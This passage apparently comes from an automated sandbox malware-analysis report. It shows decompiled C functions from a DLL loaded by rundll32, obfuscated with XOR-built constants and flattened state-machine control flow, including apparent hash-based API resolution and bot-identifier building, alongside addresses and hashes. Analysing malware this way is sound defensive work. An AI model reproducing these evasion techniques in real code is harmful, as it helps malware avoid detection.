				void* _t108;
				signed int _t117;
				signed int _t118;
				signed int _t119;
				intOrPtr* _t133;

				_v28 = 0x78e3;
				_v28 = _v28 | 0x7135a14a;
				_v28 = _v28 + 0x1554;
				_v28 = _v28 ^ 0x7136354d;
				_v8 = 0x9c2;
				_t117 = 0x5f;
				_v8 = _v8 / _t117;
				_v8 = _v8 << 9;
				_v8 = _v8 ^ 0xd7261730;
				_v8 = _v8 ^ 0xd7260392;
				_v24 = 0xd04a;
				_v24 = _v24 + 0xa8bc;
				_v24 = _v24 << 0xf;
				_v24 = _v24 ^ 0xbc833dba;
				_v40 = 0x60a0;
				_v40 = _v40 >> 0xb;
				_v40 = _v40 ^ 0x000011f0;
				_v32 = 0x3bcc;
				_v32 = _v32 >> 3;
				_v32 = _v32 << 0xa;
				_v32 = _v32 ^ 0x001da571;
				_v20 = 0xf201;
				_t118 = 0x6a;
				_v20 = _v20 / _t118;
				_v20 = _v20 | 0xe2b46b61;
				_t119 = 0x7b;
				_t133 = _a4;
				_v20 = _v20 / _t119;
				_v20 = _v20 ^ 0x01d7ce84;
				_v36 = 0x5b49;
				_v36 = _v36 * 0x73;
				_v36 = _v36 ^ 0x48cc9d1b;
				_v36 = _v36 ^ 0x48e5c7c4;
				_v16 = 0xd187;
				_v16 = _v16 << 5;
				_v16 = _v16 | 0x08003ce7;
				_v16 = _v16 + 0xe504;
				_v16 = _v16 ^ 0x081b14b1;
				_v12 = 0x85bb;
				_v12 = _v12 + 0xcd9e;
				_v12 = _v12 | 0x9f7708de;
				_v12 = _v12 ^ 0x14303fed;
				_v12 = _v12 ^ 0x8b4777c9;
				_t108 =  *((intOrPtr*)(_t133 + 0x1c))( *_t133, 1, 0);
				_t137 = _t108;
				if(_t108 != 0) {
					E10014E4B( &_v116, _v28, _v8, _v24);
					_v52 =  &_v116;
					_v48 = E100093FA(_v40, _v32, _t137,  &_v44);
					 *((intOrPtr*)(_t133 + 0x1c))( *_t133, 0xa,  &_v52);
					E1001C5F7(_v20, _v36, _v16, _v12, _v48);
				}
				return 0;
			}

0x1000881c
0x10008825
0x1000882c
0x10008833
0x1000883a
0x10008847
0x1000884c
0x10008851
0x10008855
0x1000885c
0x10008863
0x1000886a
0x10008871
0x10008875
0x1000887c
0x10008883
0x10008887
0x1000888e
0x10008895
0x10008899
0x1000889d
0x100088a4
0x100088ae
0x100088b3
0x100088b8
0x100088c2
0x100088c5
0x100088c8
0x100088cb
0x100088d2
0x100088e1
0x100088e4
0x100088eb
0x100088f2
0x100088f9
0x100088fd
0x10008904
0x1000890b
0x10008912
0x10008919
0x10008920
0x10008927
0x1000892e
0x10008937
0x1000893a
0x1000893c
0x1000894a
0x1000895b
0x10008969
0x10008974
0x10008986
0x1000898b
0x10008994

Strings

I[, xrefs: 100088D2
<, xrefs: 100088FD
M56q, xrefs: 10008833

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: I[$M56q$<
API String ID: 0-676366452
Opcode ID: 533792c641697c23b1969ba288ab2592c90c38387ee53b4d6db73c4c28b3a90b
Instruction ID: feb926e86b64a6eeca90413cc5403c2004b8354c474c07f5ba1cecbf70788985
Opcode Fuzzy Hash: 533792c641697c23b1969ba288ab2592c90c38387ee53b4d6db73c4c28b3a90b
Instruction Fuzzy Hash: 4241EF75D0020DEBEF08CFA0C94A9EEBBB1FF04304F208159D511B6290D7B95A59DF95

Uniqueness

Uniqueness Score: -1.00%

Function 10004A2B, Relevance: 3.8, Strings: 3, Instructions: 96
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E10004A2B(void* __ecx) {
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				unsigned int _v40;
				signed int _v44;
				signed int _v48;
				void* _t87;
				void* _t92;
				void* _t94;
				void* _t96;
				signed int _t102;
				void* _t104;
				signed int* _t106;

				_t106 =  &_v48;
				_v16 = 0x385f10;
				asm("stosd");
				_t94 = __ecx;
				_t104 = 0;
				_t96 = 0x34518db6;
				asm("stosd");
				asm("stosd");
				_v36 = 0xcbb3;
				_v36 = _v36 | 0xf42c2371;
				_v36 = _v36 ^ 0x43021788;
				_v36 = _v36 + 0x4a8d;
				_v36 = _v36 ^ 0xb72f589f;
				_v40 = 0x92a4;
				_t102 = 0x4a;
				_v40 = _v40 * 0x57;
				_v40 = _v40 << 3;
				_v40 = _v40 >> 7;
				_v40 = _v40 ^ 0x00036b7d;
				_v44 = 0xfc25;
				_v44 = _v44 >> 4;
				_v44 = _v44 << 2;
				_v44 = _v44 | 0xbf219be2;
				_v44 = _v44 ^ 0xbf219961;
				_v48 = 0xa043;
				_v48 = _v48 + 0xffff5a3d;
				_v48 = _v48 / _t102;
				_v48 = _v48 | 0x078bf529;
				_v48 = _v48 ^ 0x07ff8e41;
				_v20 = 0x3370;
				_v20 = _v20 >> 0xe;
				_v20 = _v20 ^ 0x00001c98;
				_v24 = 0x4528;
				_v24 = _v24 | 0xa2a77225;
				_v24 = _v24 ^ 0x1237b29c;
				_v24 = _v24 ^ 0xb090e9f5;
				_v28 = 0xec9c;
				_v28 = _v28 | 0x23d683f6;
				_v28 = _v28 >> 0xf;
				_v28 = _v28 + 0xffff32f8;
				_v28 = _v28 ^ 0xffff48c1;
				_v32 = 0x5f5a;
				_v32 = _v32 ^ 0xd2da3bda;
				_v32 = _v32 + 0xe7f3;
				_v32 = _v32 + 0xffff294c;
				_v32 = _v32 ^ 0xd2da16fe;
				do {
					while(_t96 != 0x1bdf2e1f) {
						if(_t96 == 0x309c6e61) {
							_t92 = E10007E30();
							_t106 = _t106 - 0xc + 0xc;
							_t96 = 0x1bdf2e1f;
							_t104 = _t104 + _t92;
							continue;
						} else {
							if(_t96 == 0x34518db6) {
								_t96 = 0x309c6e61;
								continue;
							}
						}
						goto L7;
					}
					_t87 = E10007544(_v20, _v24, _v28, _t94 + 4, _v32);
					_t106 =  &(_t106[3]);
					_t96 = 0x25e8f6f4;
					_t104 = _t104 + _t87;
					L7:
				} while (_t96 != 0x25e8f6f4);
				return _t104;
			}

0x10004a2b
0x10004a2e
0x10004a42
0x10004a43
0x10004a47
0x10004a49
0x10004a53
0x10004a54
0x10004a55
0x10004a5d
0x10004a65
0x10004a6d
0x10004a75
0x10004a7d
0x10004a8a
0x10004a8b
0x10004a8f
0x10004a94
0x10004a99
0x10004aa1
0x10004aa9
0x10004aae
0x10004ab3
0x10004abb
0x10004ac3
0x10004acb
0x10004ade
0x10004ae2
0x10004aea
0x10004af2
0x10004afa
0x10004aff
0x10004b07
0x10004b0f
0x10004b17
0x10004b1f
0x10004b27
0x10004b2f
0x10004b37
0x10004b3c
0x10004b44
0x10004b4c
0x10004b54
0x10004b5c
0x10004b64
0x10004b6c
0x10004b74
0x10004b74
0x10004b7e
0x10004b9f
0x10004ba4
0x10004ba7
0x10004bac
0x00000000
0x10004b80
0x10004b86
0x10004b88
0x00000000
0x10004b88
0x10004b86
0x00000000
0x10004b7e
0x10004bc4
0x10004bc9
0x10004bcc
0x10004bce
0x10004bd0
0x10004bd0
0x10004bdd

Strings

p3, xrefs: 10004AF2
(E, xrefs: 10004B07
Z_, xrefs: 10004B4C

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: (E$Z_$p3
API String ID: 0-2346288438
Opcode ID: f19db067588b1c729666bf50a3d5b19d99c1b8200e5bf7cb63d90fb317ce5846
Instruction ID: 7908451ff43d398edfe4d3dd47729a6452d00dfb1cbc6f0b7171fbae9ac85e7f
Opcode Fuzzy Hash: f19db067588b1c729666bf50a3d5b19d99c1b8200e5bf7cb63d90fb317ce5846
Instruction Fuzzy Hash: 924147B15083419BE358CE24C54A41FFBE1FBD8798F150E1DF599A6260D7B8CA098B8B

Uniqueness

Uniqueness Score: -1.00%

Function 10014E4B, Relevance: 2.7, Strings: 2, Instructions: 164
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E10014E4B(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				unsigned int _v72;
				signed int _v76;
				void* _t128;
				void* _t138;
				signed int _t141;
				intOrPtr _t143;
				signed int _t144;
				void* _t147;
				intOrPtr* _t148;
				void* _t162;
				signed int _t163;

				_push(_a12);
				_t162 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(0x40);
				_push(__ecx);
				E100056B2(_t128);
				_v20 = 0x10;
				_v32 = 0xa61f;
				_v32 = _v32 + 0xa8ad;
				_t144 = 0;
				_v32 = _v32 ^ 0x00012e5d;
				_t147 = 0x2817a0c8;
				_v36 = 0xad73;
				_t163 = 0x7d;
				_v36 = _v36 * 0x18;
				_v36 = _v36 ^ 0x00106704;
				_v28 = 0xa63d;
				_v28 = _v28 >> 3;
				_v28 = _v28 ^ 0x00001262;
				_v76 = 0xc830;
				_v76 = _v76 + 0xffffcf51;
				_v76 = _v76 ^ 0x61a5e6c8;
				_v76 = _v76 + 0xffffd3c1;
				_v76 = _v76 ^ 0x61a52b9a;
				_v60 = 0xaf2b;
				_v60 = _v60 + 0xffff794e;
				_v60 = _v60 << 9;
				_v60 = _v60 ^ 0x0050bd44;
				_v72 = 0xd683;
				_v72 = _v72 * 0x4e;
				_v72 = _v72 >> 7;
				_v72 = _v72 + 0x8cf4;
				_v72 = _v72 ^ 0x00017a15;
				_v48 = 0x2f64;
				_v48 = _v48 + 0x8745;
				_v48 = _v48 >> 9;
				_v48 = _v48 ^ 0x00003344;
				_v52 = 0xde80;
				_v52 = _v52 >> 8;
				_v52 = _v52 + 0xe2ec;
				_v52 = _v52 ^ 0x0000cf48;
				_v24 = 0x26fb;
				_v24 = _v24 ^ 0x99bfc1a1;
				_v24 = _v24 ^ 0x99bffb6f;
				_v56 = 0x40f3;
				_v56 = _v56 << 5;
				_v56 = _v56 ^ 0x9a684b3f;
				_v56 = _v56 ^ 0x9a60118c;
				_v64 = 0xe209;
				_v64 = _v64 / _t163;
				_v64 = _v64 << 2;
				_v64 = _v64 ^ 0xdf73d75b;
				_v64 = _v64 ^ 0xdf73ad9f;
				_v40 = 0xf4ff;
				_v40 = _v40 << 1;
				_v40 = _v40 * 0x32;
				_v40 = _v40 ^ 0x005fe217;
				_v68 = 0xde81;
				_v68 = _v68 + 0xc2e0;
				_v68 = _v68 << 0xc;
				_v68 = _v68 >> 0xc;
				_v68 = _v68 ^ 0x0001df05;
				_v44 = 0x9d75;
				_v44 = _v44 ^ 0xc94ec8c4;
				_v44 = _v44 ^ 0xe16feb53;
				_v44 = _v44 ^ 0x2821dabf;
				do {
					while(_t147 != 0x479232b) {
						if(_t147 == 0x1eeae304) {
							__eflags = E1001C901(_v32,  &_v16,  &_v20, _v36);
							if(__eflags != 0) {
								_t147 = 0x479232b;
								continue;
							}
						} else {
							if(_t147 == 0x264c2085) {
								_push(_v60);
								_push(_v76);
								_t138 = E10012164(0x10001270, _v28, __eflags);
								_t141 = E1000DBE9(_v48, __eflags, _v52, _v24, _t162, E10008CA3(__eflags), 0x40,  &_v16, _v56);
								__eflags = _t141;
								_t126 = _t141 > 0;
								__eflags = _t126;
								_t144 = 0 | _t126;
								E1001C5F7(_v64, _v40, _v68, _v44, _t138);
							} else {
								if(_t147 != 0x2817a0c8) {
									goto L18;
								} else {
									_t147 = 0x1eeae304;
									continue;
								}
							}
						}
						L21:
						return _t144;
					}
					_t148 =  &_v16;
					__eflags = _v16 - _t144;
					if(_v16 != _t144) {
						do {
							_t143 =  *_t148;
							__eflags = _t143 - 0x30;
							if(_t143 < 0x30) {
								L11:
								__eflags = _t143 - 0x61;
								if(_t143 < 0x61) {
									L13:
									__eflags = _t143 - 0x41;
									if(_t143 < 0x41) {
										L15:
										 *_t148 = 0x58;
									} else {
										__eflags = _t143 - 0x5a;
										if(_t143 > 0x5a) {
											goto L15;
										}
									}
								} else {
									__eflags = _t143 - 0x7a;
									if(_t143 > 0x7a) {
										goto L13;
									}
								}
							} else {
								__eflags = _t143 - 0x39;
								if(_t143 > 0x39) {
									goto L11;
								}
							}
							_t148 = _t148 + 1;
							__eflags =  *_t148 - _t144;
						} while ( *_t148 != _t144);
					}
					_t147 = 0x264c2085;
					L18:
					__eflags = _t147 - 0xaeeb649;
				} while (__eflags != 0);
				goto L21;
			}

0x10014e52
0x10014e56
0x10014e58
0x10014e5c
0x10014e60
0x10014e62
0x10014e63
0x10014e68
0x10014e73
0x10014e7d
0x10014e85
0x10014e87
0x10014e8f
0x10014e94
0x10014ea8
0x10014ea9
0x10014ead
0x10014eb5
0x10014ebd
0x10014ec2
0x10014eca
0x10014ed2
0x10014eda
0x10014ee2
0x10014eea
0x10014ef2
0x10014efa
0x10014f02
0x10014f07
0x10014f0f
0x10014f1c
0x10014f20
0x10014f25
0x10014f2d
0x10014f35
0x10014f3d
0x10014f45
0x10014f4a
0x10014f52
0x10014f5a
0x10014f5f
0x10014f67
0x10014f6f
0x10014f77
0x10014f7f
0x10014f87
0x10014f8f
0x10014f94
0x10014f9c
0x10014fa4
0x10014fb7
0x10014fbb
0x10014fc0
0x10014fc8
0x10014fd0
0x10014fd8
0x10014fe1
0x10014fe5
0x10014fed
0x10014ff5
0x10014ffd
0x10015002
0x10015007
0x1001500f
0x10015017
0x1001501f
0x10015027
0x1001502f
0x1001502f
0x10015035
0x10015063
0x10015065
0x1001506b
0x00000000
0x1001506b
0x10015037
0x1001503d
0x100150aa
0x100150b3
0x100150bb
0x100150e6
0x100150f2
0x100150fc
0x100150fc
0x100150fc
0x10015103
0x1001503f
0x10015045
0x00000000
0x10015047
0x10015047
0x00000000
0x10015047
0x10015045
0x1001503d
0x1001510e
0x10015114
0x10015114
0x1001506f
0x10015073
0x10015077
0x10015079
0x10015079
0x1001507b
0x1001507d
0x10015083
0x10015083
0x10015085
0x1001508b
0x1001508b
0x1001508d
0x10015093
0x10015093
0x1001508f
0x1001508f
0x10015091
0x00000000
0x00000000
0x10015091
0x10015087
0x10015087
0x10015089
0x00000000
0x00000000
0x10015089
0x1001507f
0x1001507f
0x10015081
0x00000000
0x00000000
0x10015081
0x10015096
0x10015097
0x10015097
0x10015079
0x1001509b
0x100150a0
0x100150a0
0x100150a0
0x00000000

Strings

D3, xrefs: 10014F4A
So, xrefs: 1001501F

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: D3$So
API String ID: 0-1798533957
Opcode ID: f8f88fcedb07124a3c2552d532e28816b7cee94d3e288d1335ce9db65d1f1dfa
Instruction ID: a36dc09e0a722225465dbaf5dc1fbc69e17eb54196c5202d43f44068f2dc291a
Opcode Fuzzy Hash: f8f88fcedb07124a3c2552d532e28816b7cee94d3e288d1335ce9db65d1f1dfa
Instruction Fuzzy Hash: 3D7164710093419FD355CE60C88990FBBE1FBC5788F40491DF1969A2A1D3B6DA8ACF87

Uniqueness

Uniqueness Score: -1.00%

Function 10011B71, Relevance: 2.7, Strings: 2, Instructions: 164
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E10011B71(intOrPtr* __ecx, void* __edx, signed int _a4, intOrPtr _a8) {
				char _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				void* _t130;
				signed int _t156;
				signed int _t158;
				signed int _t159;
				signed int _t160;
				void* _t163;
				intOrPtr* _t180;
				signed int* _t181;
				signed int* _t184;

				_t181 = _a4;
				_push(_a8);
				_t180 = __ecx;
				_push(_t181);
				_push(__ecx);
				E100056B2(_t130);
				_a4 = 0x4753;
				_t184 =  &(( &_v100)[4]);
				_a4 = _a4 >> 4;
				_t163 = 0x1ce4a29c;
				_t158 = 0x7b;
				_a4 = _a4 / _t158;
				_a4 = _a4 + 0xffff71bd;
				_a4 = _a4 ^ 0xffff4206;
				_v72 = 0xd68c;
				_t159 = 5;
				_v72 = _v72 * 0x66;
				_v72 = _v72 ^ 0x00552ab5;
				_v56 = 0xc5bd;
				_v56 = _v56 * 0x1e;
				_v56 = _v56 ^ 0x00172fa5;
				_v96 = 0x2782;
				_v96 = _v96 << 5;
				_v96 = _v96 >> 2;
				_v96 = _v96 / _t159;
				_v96 = _v96 ^ 0x00004dd3;
				_v60 = 0xbb2b;
				_v60 = _v60 ^ 0x9bc1f403;
				_v60 = _v60 ^ 0x9bc17fed;
				_v64 = 0x890;
				_t160 = 0x79;
				_v64 = _v64 / _t160;
				_v64 = _v64 ^ 0x00001224;
				_v68 = 0xd52d;
				_v68 = _v68 | 0x66ad6dc2;
				_v68 = _v68 ^ 0x66addc3f;
				_v80 = 0x2d15;
				_v80 = _v80 ^ 0xe1b04c0e;
				_v80 = _v80 | 0x8df21731;
				_v80 = _v80 ^ 0xedf2018b;
				_v84 = 0x4d41;
				_v84 = _v84 + 0xffffece7;
				_v84 = _v84 ^ 0xe6ee3790;
				_v84 = _v84 * 0x66;
				_v84 = _v84 ^ 0x02d92ffd;
				_v76 = 0x5bdd;
				_v76 = _v76 * 0x72;
				_v76 = _v76 << 0xf;
				_v76 = _v76 ^ 0x7435051d;
				_v88 = 0x9998;
				_v88 = _v88 * 0xf;
				_v88 = _v88 << 3;
				_v88 = _v88 + 0xffff20a8;
				_v88 = _v88 ^ 0x004709cc;
				_v92 = 0xdec6;
				_v92 = _v92 >> 0xc;
				_v92 = _v92 ^ 0x867abd03;
				_v92 = _v92 * 0x46;
				_v92 = _v92 ^ 0xc58fdc4c;
				_v100 = 0x13e8;
				_v100 = _v100 << 9;
				_v100 = _v100 * 0x42;
				_v100 = _v100 + 0xff79;
				_v100 = _v100 ^ 0x0a449f79;
				do {
					while(_t163 != 0x2937ce5) {
						if(_t163 == 0x183d422a) {
							E10018582(_v84, _t180 + 4, __eflags, _v76,  &_v52, _v88, _v92);
						} else {
							if(_t163 == 0x1ce4a29c) {
								_t163 = 0x35771045;
								 *_t181 =  *_t181 & 0x00000000;
								_t181[1] = _v100;
								continue;
							} else {
								if(_t163 == 0x1ed204aa) {
									E1000CD04(_v64,  *_t180, _v68,  &_v52, _v80);
									_t184 =  &(_t184[3]);
									_t163 = 0x183d422a;
									continue;
								} else {
									if(_t163 == 0x3303492c) {
										_push(_t163);
										_t156 = E100157E8(_t181[1]);
										 *_t181 = _t156;
										__eflags = _t156;
										if(__eflags != 0) {
											_t163 = 0x2937ce5;
											continue;
										}
									} else {
										if(_t163 != 0x35771045) {
											goto L13;
										} else {
											_t181[1] = E10004A2B(_t180);
											_t163 = 0x3303492c;
											continue;
										}
									}
								}
							}
						}
						L16:
						__eflags =  *_t181;
						_t129 =  *_t181 != 0;
						__eflags = _t129;
						return 0 | _t129;
					}
					E1001F3E9(_v56, _v96, _v60, _t181,  &_v52);
					_t184 =  &(_t184[3]);
					_t163 = 0x1ed204aa;
					L13:
					__eflags = _t163 - 0x1f54ddf;
				} while (__eflags != 0);
				goto L16;
			}

0x10011b77
0x10011b7c
0x10011b80
0x10011b82
0x10011b84
0x10011b85
0x10011b8a
0x10011b95
0x10011b98
0x10011ba3
0x10011baa
0x10011baf
0x10011bb5
0x10011bbd
0x10011bc5
0x10011bd2
0x10011bd5
0x10011bd9
0x10011be1
0x10011bee
0x10011bf2
0x10011bfa
0x10011c02
0x10011c07
0x10011c14
0x10011c18
0x10011c20
0x10011c28
0x10011c30
0x10011c38
0x10011c44
0x10011c47
0x10011c4b
0x10011c53
0x10011c5b
0x10011c63
0x10011c6b
0x10011c73
0x10011c7b
0x10011c83
0x10011c8b
0x10011c93
0x10011c9b
0x10011ca8
0x10011cac
0x10011cb4
0x10011cc1
0x10011cc5
0x10011cca
0x10011cd2
0x10011cdf
0x10011ce3
0x10011ce8
0x10011cf0
0x10011cf8
0x10011d00
0x10011d05
0x10011d12
0x10011d16
0x10011d23
0x10011d30
0x10011d3a
0x10011d3e
0x10011d46
0x10011d4e
0x10011d4e
0x10011d5c
0x10011e2e
0x10011d62
0x10011d68
0x10011ddc
0x10011dde
0x10011de1
0x00000000
0x10011d6a
0x10011d70
0x10011dc6
0x10011dcb
0x10011dce
0x00000000
0x10011d72
0x10011d78
0x10011d9b
0x10011d9f
0x10011da4
0x10011da7
0x10011da9
0x10011daf
0x00000000
0x10011daf
0x10011d7a
0x10011d7c
0x00000000
0x10011d82
0x10011d89
0x10011d8c
0x00000000
0x10011d8c
0x10011d7c
0x10011d78
0x10011d70
0x10011d68
0x10011e36
0x10011e38
0x10011e3d
0x10011e3d
0x10011e44
0x10011e44
0x10011dfb
0x10011e00
0x10011e03
0x10011e08
0x10011e08
0x10011e08
0x00000000

Strings

AM, xrefs: 10011C8B
SG, xrefs: 10011B8A

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: AM$SG
API String ID: 0-2359636636
Opcode ID: 335b760aecf9311ccc4c76b46dd11e98044fb8b6b4e5fe0ea9c494827d2a9ad0
Instruction ID: 73a1d719dcb80061ca56764ad851f481a03b11d3d12b559eb37b6c303cc90ad2
Opcode Fuzzy Hash: 335b760aecf9311ccc4c76b46dd11e98044fb8b6b4e5fe0ea9c494827d2a9ad0
Instruction Fuzzy Hash: 807147B15083429FD368CF21D48645FBBE1FBC4348F504A1EF5968A260D375DA89CF82

Uniqueness

Uniqueness Score: -1.00%

Function 1001C6AD, Relevance: 2.6, Strings: 2, Instructions: 148
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E1001C6AD(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				char _v328;
				char _t161;
				signed int _t164;
				void* _t167;
				signed int _t169;
				signed int _t170;
				signed int _t171;
				signed int _t172;
				signed int _t173;
				char* _t174;
				intOrPtr* _t193;
				void* _t194;
				void* _t195;
				void* _t196;

				_v40 = 0xfa39;
				_v40 = _v40 + 0xdb01;
				_v40 = _v40 + 0xffffe592;
				_v40 = _v40 ^ 0x0001c62b;
				_v68 = 0xbea4;
				_v68 = _v68 >> 0xd;
				_v68 = _v68 ^ 0x00007ac8;
				_v36 = 0x4356;
				_v36 = _v36 >> 0x10;
				_v36 = _v36 >> 4;
				_v36 = _v36 ^ 0x00002e98;
				_v12 = 0xe2d2;
				_v12 = _v12 >> 6;
				_v12 = _v12 + 0xffff2c83;
				_t193 = __ecx;
				_v12 = _v12 * 0x62;
				_v12 = _v12 ^ 0xffb02725;
				_v16 = 0xb4cd;
				_v16 = _v16 >> 9;
				_v16 = _v16 | 0xafffddff;
				_v16 = _v16 ^ 0xafffea00;
				_v8 = 0x68cb;
				_v8 = _v8 | 0xb32e4b28;
				_v8 = _v8 << 0xf;
				_v8 = _v8 ^ 0x0d8dd4c4;
				_v8 = _v8 ^ 0x38786c55;
				_v48 = 0xfb83;
				_v48 = _v48 | 0x7a1a2a9c;
				_v48 = _v48 ^ 0x7a1ab4a3;
				_v20 = 0x79fd;
				_t169 = 3;
				_v20 = _v20 / _t169;
				_v20 = _v20 + 0x1426;
				_t170 = 0x65;
				_v20 = _v20 / _t170;
				_v20 = _v20 ^ 0x00003bd3;
				_v28 = 0xa065;
				_t171 = 0x78;
				_v28 = _v28 / _t171;
				_v28 = _v28 | 0x67e4385d;
				_v28 = _v28 ^ 0x67e41ce2;
				_v52 = 0xcb25;
				_v52 = _v52 | 0x001bc1db;
				_v52 = _v52 ^ 0x001ba08f;
				_v60 = 0xfe76;
				_v60 = _v60 + 0xffff45c9;
				_v60 = _v60 ^ 0x00003b0c;
				_v32 = 0xb195;
				_v32 = _v32 + 0xffff6114;
				_v32 = _v32 << 6;
				_v32 = _v32 ^ 0x0004e941;
				_v24 = 0xa461;
				_v24 = _v24 >> 0xd;
				_t172 = 0x2a;
				_v24 = _v24 / _t172;
				_v24 = _v24 * 0x41;
				_v24 = _v24 ^ 0x00004365;
				_v64 = 0x6361;
				_t173 = 0x6a;
				_t174 =  &_v328;
				_v64 = _v64 / _t173;
				_v64 = _v64 ^ 0x00000cc9;
				_v56 = 0x48bf;
				_v56 = _v56 ^ 0x5ae3b612;
				_v56 = _v56 ^ 0x5ae38705;
				_v44 = 0xaf17;
				_v44 = _v44 | 0xd3b2bd8d;
				_v44 = _v44 << 5;
				_v44 = _v44 ^ 0x7657b8ea;
				while(1) {
					_t161 =  *_t193;
					if(_t161 == 0) {
						break;
					}
					if(_t161 == 0x2e) {
						 *_t174 = 0;
					} else {
						 *_t174 = _t161;
						_t174 = _t174 + 1;
						_t193 = _t193 + 1;
						continue;
					}
					L6:
					_t194 = E10015719(_v40, _v68, _v36,  &_v328, _v12);
					_t196 = _t195 + 0xc;
					if(_t194 != 0) {
						L8:
						_t164 = E10010EAE(_t193 + 1, _v28, _v52, _v60, _v32);
						_push(_v44);
						_push(_v56);
						_push(_t194);
						_push(_v64);
						return E10002419(_v24, _t164 ^ 0x165fe069);
					}
					_t167 = E10018DF5( &_v328, _v16, _v8, _v48, _v20);
					_t194 = _t167;
					_t196 = _t196 + 0xc;
					if(_t194 != 0) {
						goto L8;
					}
					return _t167;
				}
				goto L6;
			}

0x1001c6b6
0x1001c6bf
0x1001c6c6
0x1001c6cd
0x1001c6d4
0x1001c6db
0x1001c6df
0x1001c6e6
0x1001c6ed
0x1001c6f1
0x1001c6f5
0x1001c6fc
0x1001c703
0x1001c707
0x1001c716
0x1001c718
0x1001c71b
0x1001c722
0x1001c729
0x1001c72d
0x1001c734
0x1001c73b
0x1001c742
0x1001c749
0x1001c74d
0x1001c754
0x1001c75b
0x1001c762
0x1001c769
0x1001c770
0x1001c77a
0x1001c77f
0x1001c784
0x1001c78e
0x1001c793
0x1001c798
0x1001c79f
0x1001c7a9
0x1001c7ae
0x1001c7b3
0x1001c7ba
0x1001c7c1
0x1001c7c8
0x1001c7cf
0x1001c7d6
0x1001c7dd
0x1001c7e4
0x1001c7eb
0x1001c7f2
0x1001c7f9
0x1001c7fd
0x1001c804
0x1001c80b
0x1001c812
0x1001c817
0x1001c81e
0x1001c821
0x1001c82a
0x1001c834
0x1001c837
0x1001c83d
0x1001c840
0x1001c847
0x1001c84e
0x1001c855
0x1001c85c
0x1001c863
0x1001c86a
0x1001c86e
0x1001c87f
0x1001c87f
0x1001c883
0x00000000
0x00000000
0x1001c879
0x1001c887
0x1001c87b
0x1001c87b
0x1001c87d
0x1001c87e
0x00000000
0x1001c87e
0x1001c88a
0x1001c8a2
0x1001c8a4
0x1001c8a9
0x1001c8cb
0x1001c8da
0x1001c8df
0x1001c8e7
0x1001c8ec
0x1001c8ed
0x00000000
0x1001c8f8
0x1001c8bd
0x1001c8c2
0x1001c8c4
0x1001c8c9
0x00000000
0x00000000
0x1001c900
0x1001c900
0x00000000

Strings

Ulx8, xrefs: 1001C754
]8g, xrefs: 1001C7B3

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Ulx8$]8g
API String ID: 0-1828074717
Opcode ID: 5efb796bbd5c0bd0a1b08533b1cf97a22a6e006468b28043f05add0be14b9d1a
Instruction ID: 5bc45f7731ee84d747845716ac0e0d381f413dec0c038b2a0d0c64420890e08a
Opcode Fuzzy Hash: 5efb796bbd5c0bd0a1b08533b1cf97a22a6e006468b28043f05add0be14b9d1a
Instruction Fuzzy Hash: 95615571D0121DEBEF08CFA0D84A5EEBBB2FF04314F208158D411BA2A4D7B95A59CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1001CAA0, Relevance: 2.6, Strings: 2, Instructions: 147
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

